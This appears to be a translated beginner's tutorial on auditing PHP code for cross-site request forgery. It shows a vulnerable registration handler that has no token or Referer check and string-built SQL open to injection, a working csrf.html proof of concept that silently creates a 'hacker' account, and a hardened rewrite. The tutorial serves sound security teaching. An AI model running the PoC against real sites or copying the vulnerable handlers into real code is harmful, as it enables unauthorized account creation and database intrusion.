Notes written down by a cyber-security beginner while studying, shared here on CSDN in the hope of growing, learning, sharing and improving together with everyone. This post covers cross-site request forgery in code auditing; I hope it helps those who are just getting into code auditing. Experts are welcome to take a look, please go easy on me, and feel free to message me to exchange ideas. The article draws on other references, and I thank the mentors who taught me security, and am grateful to have been born in this internet age where knowledge is within reach.
CSRF
Cross-Site Request Forgery
Principle: without the user noticing, the attacker makes the user's browser send a malicious HTTP request to a CSRF-vulnerable site; because the browser attaches the user's session cookie automatically, the site treats the request as the user's own.
Where to look:
1. Admin backends, member centres, user creation, profile editing and similar state-changing functions
2. The script handling the request validates neither a token nor the Referer header
Case:
User login module login.html:
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<title>用戶登錄</title>
</head>
<body>
<form action="login.php" method="post">
賬號:<input type="text" name="username"><br>
密碼:<input type="password" name="password"><br>
<input type="submit" value="點擊登錄" name="login">
</form>
</body>
</html>
The server-side script login.php receives the submitted username and password and performs the login:
<?php
header("content-type:text/html;charset=utf-8");
if (!isset($_POST['login'])) {
    exit('illegal access!');
} else {
    $username = $_POST['username'];
    $password = $_POST['password'];
    include('conn.php');
    // This case uses the legacy mysql_* API (PHP 5, removed in PHP 7); the input is
    // interpolated into the query unescaped, which is not the topic of this post.
    $sql = "SELECT * FROM user WHERE username='$username' and password='$password';";
    $result = mysql_query($sql);
    if ($row = mysql_fetch_array($result)) {
        session_start();  // the session must be started before $_SESSION is written
        $_SESSION['username'] = $row['username'];
        echo $_SESSION['username'] . ",welcome!";
        echo '<a href="reg.html">添加用戶</a>';
    }
}
The user registration module reg.html, which is vulnerable to CSRF:
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<title>會員註冊</title>
</head>
<body>
<form action="reg.php" method="post">
用戶註冊<br >
用戶名:<input type="text" name="username"><br >
密碼:<input type="password" name="password"><br >
<input type="submit" name="submit" value="添加用戶">
</form>
</body>
</html>
The server-side script reg.php receives the submitted username and password and creates the account:
<?php
header("content-type:text/html;charset=utf-8");
session_start();
if (!isset($_SESSION['username'])) {
    echo '<script>alert("please login again!")</script>';
    exit();
} else {
    // The only check is that a login session exists: there is no CSRF token and no
    // Referer check, so any POST that carries the victim's session cookie is accepted.
    $username = $_POST['username'];
    $password = $_POST['password'];
    include('conn.php');
    // String values must be quoted; unquoted they are parsed as column names and the insert fails.
    $sql = "INSERT INTO csrf VALUES ('$username','$password')";
    $result = mysql_query($sql);
    if ($result) {
        echo '<script>alert("register success!")</script>';
    } else {
        echo '<script>alert("register fail!")</script>';
    }
}
Database connection file conn.php:
<?php
// Legacy mysql_* API; the credentials are the post's local test values.
$conn = mysql_connect("localhost", "root", "root");
mysql_select_db("csrf", $conn);
Adding a user through reg.html requires being logged in, because reg.php checks whether a username session exists.
We log in, submit reg.html while capturing the request, and build the PoC csrf.html from it:
<html>
<body>
<script>history.pushState('', '', '/')</script>
<form action="http://localhost/reg.php" method="POST">
<input type="hidden" name="username" value="hacker" />
<input type="hidden" name="password" value="123456" />
<input type="hidden" name="submit" value="添加用戶" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
Lure the logged-in user into opening csrf.html; the browser submits the form together with the user's session cookie, so reg.php accepts it and the account is created.
Flow diagram:
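To show how the two missing checks from the "where to look" list are actually added, here is a hardened counterpart of reg.php. This is an added example, not code from the original post: it assumes the site is served at http://localhost as in the PoC's action URL, a MySQL database csrf with a table csrf(username, password), and PHP 7.3 or later. The helper names csrf_token(), csrf_check() and same_origin() and the constant SITE_HOST are my own. Because a static reg.html cannot carry a per-session token, the form is rendered by the script itself on GET.

```php
<?php
// Added example: a hardened counterpart of the post's reg.php (not the post's own code).
// Assumptions: site served at http://localhost as in the PoC; MySQL database "csrf"
// with a table csrf(username, password); PHP >= 7.3 (array form of session_set_cookie_params).
const SITE_HOST = 'localhost';

header("content-type:text/html;charset=utf-8");
// Third defence layer: a SameSite cookie is not attached to cross-site POSTs at all.
session_set_cookie_params(['samesite' => 'Lax', 'httponly' => true]);
session_start();

// Per-session synchronizer token: random, stored server-side, never readable cross-site.
function csrf_token(): string {
    if (empty($_SESSION['csrf_token'])) {
        $_SESSION['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $_SESSION['csrf_token'];
}

// Constant-time check of the submitted token against the session token.
function csrf_check($submitted): bool {
    if (!is_string($submitted) || empty($_SESSION['csrf_token'])) {
        return false;
    }
    return hash_equals($_SESSION['csrf_token'], $submitted);
}

// Second layer: Origin (or Referer, if Origin is absent) must name this host.
// A form submitted from csrf.html arrives with a foreign Origin and is rejected here.
function same_origin(array $server, string $expected_host): bool {
    $src = $server['HTTP_ORIGIN'] ?? $server['HTTP_REFERER'] ?? '';
    $host = $src === '' ? null : parse_url($src, PHP_URL_HOST);
    return is_string($host) && strcasecmp($host, $expected_host) === 0;
}

if (!isset($_SESSION['username'])) {
    echo '<script>alert("please login again!")</script>';
    exit();
}

if ($_SERVER['REQUEST_METHOD'] !== 'POST') {
    // The form is rendered here (not from a static reg.html) so the token can be embedded.
    $token = htmlspecialchars(csrf_token(), ENT_QUOTES, 'UTF-8');
    echo '<form action="reg.php" method="post">'
       . 'username: <input type="text" name="username"><br>'
       . 'password: <input type="password" name="password"><br>'
       . '<input type="hidden" name="csrf_token" value="' . $token . '">'
       . '<input type="submit" name="submit" value="add user">'
       . '</form>';
    exit();
}

// Both checks must pass before any state change; failures are logged for detection.
if (!csrf_check($_POST['csrf_token'] ?? null) || !same_origin($_SERVER, SITE_HOST)) {
    http_response_code(403);
    error_log('CSRF check failed for ' . $_SESSION['username']
        . ' origin=' . ($_SERVER['HTTP_ORIGIN'] ?? '-')
        . ' referer=' . ($_SERVER['HTTP_REFERER'] ?? '-'));
    exit('invalid request');
}

$username = $_POST['username'] ?? '';
$password = $_POST['password'] ?? '';
// Prepared statement instead of the post's string interpolation. The password is stored
// as the post's login.php expects (plain comparison); hashing it is a separate fix.
$db = new mysqli('localhost', 'root', 'root', 'csrf');   // placeholder credentials, as in conn.php
$stmt = $db->prepare('INSERT INTO csrf (username, password) VALUES (?, ?)');
$stmt->bind_param('ss', $username, $password);
if ($stmt->execute()) {
    echo '<script>alert("register success!")</script>';
} else {
    echo '<script>alert("register fail!")</script>';
}
```

With this version the PoC from the post no longer works: csrf.html cannot read the token from the victim's session, its POST carries a foreign Origin, and with SameSite=Lax the session cookie is not even sent. The token is the primary control; the Origin/Referer check is deliberately strict (a request with neither header is refused), so clients behind privacy proxies that strip both headers will need to rely on the token path being reached through the rendered form. The error_log line gives the SOC a concrete signal to alert on.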